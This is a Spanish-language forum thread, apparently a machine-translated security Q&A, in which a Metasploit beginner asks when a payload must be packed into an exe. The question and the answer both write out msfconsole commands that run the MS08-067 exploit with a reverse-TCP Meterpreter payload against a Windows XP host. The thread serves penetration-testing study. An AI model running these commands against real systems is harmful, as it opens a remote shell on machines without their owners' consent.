Cuándo enviar un archivo exe al sistema de destino para explotar a través de metasploit

1

Soy novato en Metasploit. Todavía estoy aprendiendo lo básico, pero estoy confundido y me gustaría algo de ayuda.

1) - Anteriormente aprendí cómo simplemente explotar cualquier O.S. vulnerabilidad utilizando meterpreter. Podemos enviar un exploit al sistema de destino y crear un shell de enlace / inverso para el control. Ejemplo -

Hackee windows xp con MS08-067 exploit

msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4 (objetivo) RHOST => 192.168.1.4

msf exploit(ms08_067_netapi) > exploit %código% meterpreter > sysinfo

Ahora, con los comandos anteriores, podemos usar un shell de destino desde la máquina atacante. No es necesario crear ningún archivo ejecutable para conectarse al sistema vulnerable objetivo. Meterpreter inyecta memoria automáticamente y podemos obtener shell.

2) -

Ahora, cuando usamos un codificador, tenemos que crear un exe y tenemos que enlazar nuestra carga útil dentro del exe. Cuando la víctima ejecuta este archivo, podemos obtener el shell del sistema de la víctima.

meterpreter > shell

Para explotar el sistema de la víctima, tenemos que transferir este archivo exe a su sistema.

Pregunta :

Anteriormente no requerimos ningún archivo ejecutable para explotar un sistema, pero con el uso de un codificador necesitamos un archivo ejecutable para ocultar la carga útil. ¿Podemos simplemente codificar nuestro paypreter tcp_bind payload sin exe y enviarlo al sistema víctima?

Cualquier ayuda realmente apreciable.

    
pregunta Prashant K Shukla 10.08.2017 - 07:05
fuente

1 respuesta

1

Información de fondo (porque metasploit es mi mermelada): La mayoría de los sistemas actualizados no son realmente susceptibles a ataques remotos (como usted implica). La carga útil de acceso remoto que especificó se usa en Windows XP, por ejemplo. La razón por la que se utilizan msfvenom y otras cosas, junto con el exe es porque se puede usar para tratar de evadir el antivirus y otras cosas a lo largo de las líneas. (Sin embargo, la codificación se utiliza para deshacerse de los caracteres incorrectos y no hacer que el antivirus sea invisible).

Respuesta: Sí, puede explotar directamente el sistema, sin embargo, no necesita especificar la carga útil. Tras una explotación exitosa con ms08, se abrirá una sesión de meterpreter.

Ejemplo de Exploit: msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set rhost <IP>; exploit"

Aquí hay un enlace útil para esta carga útil específica .

(si esto es lo que querías decir anteriormente)

    
respondido por el Paul_C 10.08.2017 - 17:33
fuente

Lea otras preguntas en las etiquetas